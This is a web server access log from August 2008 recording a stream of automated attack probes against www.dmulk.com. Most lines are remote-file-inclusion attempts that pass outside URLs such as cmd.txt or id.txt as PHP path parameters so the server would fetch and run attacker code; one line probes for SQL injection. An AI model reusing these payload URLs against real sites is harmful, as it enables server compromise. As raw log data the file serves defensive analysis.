207.162.215.10 - - [07/Aug/2008:09:19:58 -0700] "GET /logs/access_080105.log//SQuery/lib/gore.php?libpath=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:19:58 -0700] "GET //SQuery/lib/gore.php?libpath=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:19:58 -0700] "GET /logs//SQuery/lib/gore.php?libpath=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.124.77.159 - - [07/Aug/2008:09:20:06 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:20:08 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:20:08 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.88.11 - - [07/Aug/2008:09:20:12 -0700] "GET /logs/install.php?xcart_dir=http://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.214.88.11 - - [07/Aug/2008:09:20:12 -0700] "GET /install.php?xcart_dir=http://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.214.88.11 - - [07/Aug/2008:09:20:13 -0700] "GET /install.php?xcart_dir=http://msmen.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.214.88.11 - - [07/Aug/2008:09:20:13 -0700] "GET /logs/install.php?xcart_dir=http://msmen.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:09:20:20 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:09:20:21 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:20:21 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:20:21 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:09:20:21 -0700] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:20:21 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:09:20:22 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:20:23 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:20:23 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.32.176.135 - - [07/Aug/2008:09:20:27 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:09:20:33 -0700] "GET /bikes/dteel/2008_02_15/?S=A HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.251.141.233 - - [07/Aug/2008:09:20:53 -0700] "GET /logs/db.php?path_local=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.251.141.233 - - [07/Aug/2008:09:20:59 -0700] "GET /db.php?path_local=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:09:20:59 -0700] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:21:05 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:21:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:21:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:21:06 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.85.54.90 - - [07/Aug/2008:09:21:08 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.60.207.171 - - [07/Aug/2008:09:21:15 -0700] "GET /logs/access_080227.log//adminoneadmin/newspublish/include.php?path[docroot]=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.253.134.145 - - [07/Aug/2008:09:21:16 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.134.145 - - [07/Aug/2008:09:21:17 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.88.11 - - [07/Aug/2008:09:21:30 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.214.88.11 - - [07/Aug/2008:09:21:30 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://msmen.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:21:34 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:21:35 -0700] "GET /logs/access_080220.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:21:35 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:21:36 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:21:36 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:21:36 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:21:53 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:21:53 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:21:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:21:54 -0700] "GET /install.php?xcart_dir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:21:55 -0700] "GET /logs/install.php?xcart_dir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:58 -0700] "GET /logs/access_080309.log/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.152.178.42 - - [07/Aug/2008:09:21:58 -0700] "GET /logs/access_080329.log/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?mosConfig_absolute_pathhttp://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:58 -0700] "GET /index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:58 -0700] "GET /logs/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:58 -0700] "GET /logs/access_080215.log/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:58 -0700] "GET /logs/access_080309.log/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:58 -0700] "GET /index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:58 -0700] "GET /logs/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:58 -0700] "GET /logs/access_080215.log/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:59 -0700] "GET /logs/access_080309.log/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:59 -0700] "GET /index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:59 -0700] "GET /logs/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [07/Aug/2008:09:21:59 -0700] "GET /logs/access_080215.log/index3.php?d=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:22:00 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:22:01 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:22:01 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:22:01 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:22:01 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:22:01 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.251.141.233 - - [07/Aug/2008:09:22:04 -0700] "GET /logs/access_080209.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.251.141.233 - - [07/Aug/2008:09:22:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:22:04 -0700] "GET /install.php?xcart_dir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:22:04 -0700] "GET /logs/install.php?xcart_dir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
63.251.141.233 - - [07/Aug/2008:09:22:04 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:22:12 -0700] "GET /logs/install.php?xcart_dir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:22:12 -0700] "GET /install.php?xcart_dir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:22:12 -0700] "GET /logs/install.php?xcart_dir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:22:12 -0700] "GET /install.php?xcart_dir=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
82.49.28.184 - - [07/Aug/2008:09:22:34 -0700] "GET /logs/access_080324.log/modules/xfsection/modify.php?dir_module=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.49.28.184 - - [07/Aug/2008:09:22:35 -0700] "GET /modules/xfsection/modify.php?dir_module=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.49.28.184 - - [07/Aug/2008:09:22:37 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:22:38 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [07/Aug/2008:09:22:47 -0700] "GET /logs/access_080218.log/index.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [07/Aug/2008:09:22:49 -0700] "GET /index.php?id=' HTTP/1.1" 200 18315 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [07/Aug/2008:09:22:49 -0700] "GET /logs/index.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:23:37 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:23:39 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:23:42 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:23:48 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:23:49 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:23:49 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:23:50 -0700] "GET /logs/access_080205.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:23:50 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:23:51 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:23:54 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:23:55 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:23:58 -0700] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:23:58 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:23:58 -0700] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:24:00 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:24:03 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:24:06 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:24:08 -0700] "GET /logs/access_080528.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.152.178.42 - - [07/Aug/2008:09:24:18 -0700] "GET /logs/access_080311.log/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?mosConfig_absolute_pathhttp://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:24:27 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:24:27 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:24:29 -0700] "GET //SQuery/lib/gore.php?libpath=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.60.207.171 - - [07/Aug/2008:09:24:43 -0700] "GET /logs/access_080219.log//adminoneadmin/newspublish/include.php?path[docroot]=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.154.47 - - [07/Aug/2008:09:24:50 -0700] "GET /logs/access.log//?id=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.22.143.171 - - [07/Aug/2008:09:24:51 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://adecova.com/descargas/babih.pdf1/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
69.57.154.47 - - [07/Aug/2008:09:24:52 -0700] "GET //?id=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 200 18385 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.154.47 - - [07/Aug/2008:09:24:53 -0700] "GET /logs//?id=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 200 59573 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:24:54 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:24:54 -0700] "GET /logs/access_080103.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:25:07 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:25:07 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:25:08 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 18509 "-" "libwww-perl/5.812" "www.dmulk.com"
